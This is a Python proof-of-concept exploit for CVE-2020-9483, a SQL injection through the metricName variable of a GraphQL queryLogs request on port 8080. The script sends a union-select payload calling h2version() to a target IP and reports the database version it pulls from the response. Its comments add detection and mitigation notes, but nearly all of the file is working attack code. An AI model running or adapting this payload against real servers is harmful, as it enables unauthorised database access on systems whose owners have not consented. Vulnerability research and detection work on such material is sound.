# --CVE-2020-9483-PoC--
# -*- Encoding: utf-8 -*-
import requests
import json
import argparse
import sys
import re


def host():
    """Build the target GraphQL endpoint URL from the ``-ip`` command-line option.

    Reads ``sys.argv`` through argparse. The supplied host is combined with the
    fixed port 8080 and the ``/graphql`` path. If argparse raises
    ``ArgumentError`` (``exit_on_error=False`` is set, so parse failures are
    surfaced as exceptions on supported Python versions), a usage hint is
    printed and the process exits with status 0.

    Returns:
        str: ``http://<ip>:8080/graphql``.
    """
    try:
        arg_parser = argparse.ArgumentParser(
            description='PoC for CVE-2020-9483 by shiro',
            exit_on_error=False,
        )
        arg_parser.add_argument('-ip', required=True)
        parsed = arg_parser.parse_args()
        # Coerce explicitly so the value is always a plain str before formatting.
        target_host = str(parsed.ip)
        return f"http://{target_host}:8080/graphql"
    except argparse.ArgumentError:
        print("[-]usage:python3 CVE-2020-9483.py -ip 127.0.0.1")
        sys.exit(0)


def poc(url):
    """Send the CVE-2020-9483 test query to *url* and print what came back.

    Args:
        url: Full GraphQL endpoint URL, as produced by ``host()``.

    Side effects: exactly one HTTP POST, console output, and ``sys.exit(0)``
    when the connection fails. Nothing is returned.

    Defender note: the injected value travels in a GraphQL *variable*
    (``condition.metricName``) rather than in the query text, so request
    logging that captures only the ``query`` string will not show it; log the
    variables object as well when hunting for this. Mitigation is server-side
    (upgrade to a release that addresses CVE-2020-9483 per the vendor
    advisory); nothing here can be made safe by the client.
    """
    # Browser-like User-Agent plus the JSON content type GraphQL expects.
    header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36',
              'Content-type': 'application/json'
    }
    # The only attacker-controlled field is ``metricName``; the rest of the
    # ``queryLogs`` condition is filler so the request is otherwise well-formed.
    # Detection angle: SQL keywords / comment sequences inside the variables of
    # a ``queryLogs`` operation are never expected from a legitimate UI.
    payload = {"query":"query queryLogs($condition: LogQueryCondition){queryLogs(condition: $condition){total,logs{serviceId,serviceName,isError,content}}}",
               "variables": {"condition": {"metricName":"INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --", "endpointId": "1", "traceId": "1", "state": "ALL", "stateCode": "1", "paging": {"pageSize": 10}}}}
    data = json.dumps(payload)
    #print(data)
    try:
        # 3 s timeout; only ConnectionError is handled. NOTE(review): a read
        # timeout (requests.exceptions.ReadTimeout) is not a ConnectionError
        # subclass and would propagate as an uncaught exception here — confirm.
        res = requests.post(url=url, headers=header, data=data, timeout=3)
        print("[+]got response")
    except requests.exceptions.ConnectionError:
        print("[-]timeout :(")
        print("[-]bye~~~")
        sys.exit(0)
    # Printed unconditionally — the HTTP status is never checked, so a 4xx/5xx
    # or an error-shaped GraphQL body reaches this line as well.
    print("[+]SQL Injection complete")
    # "Success" is inferred only from a dotted x.y.z token anywhere in the
    # response body; an empty list means nothing version-like was found.
    version = re.findall(r"\d+\.\d+\.\d+", res.text)
    #print(version)
    print("[+]Database version is " + str(version))
    print("[+]Done!")


if __name__ == "__main__":
    # Entry point: resolve the target URL from ``-ip``, then issue the single request.
    poc(host())